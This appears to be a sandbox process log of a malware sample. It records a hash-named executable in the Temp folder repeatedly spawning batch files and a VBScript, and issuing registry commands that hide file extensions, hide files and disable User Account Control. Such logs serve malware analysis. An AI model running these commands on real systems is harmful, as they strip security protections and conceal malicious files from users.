C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\euwcscwU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TCUcIYkc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LkkMQAYc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dqYAMUoc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\gSQEQIkg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mSQQYMEI.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YycUMgQQ.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OyYokYsE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\feowIEss.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LKsYMIIE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FmEkgcoc.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sIMgkEEg.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eigEEYQs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ouAkIgcs.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pggAUMcU.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jCUMQIgE.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tuMwYEsA.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv wZhl4Ag/GkuhwUoRO0W+GA.0.2

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lcgAQEIo.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kmQwEsEw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GmcwEgQw.bat" "C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N.exe

C:\Users\Admin\AppData\Local\Temp\db0f5b878e6eb1fdb208a1b3fa600ae21acf085e6192c77cbeb5afcaf0f671f9N

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

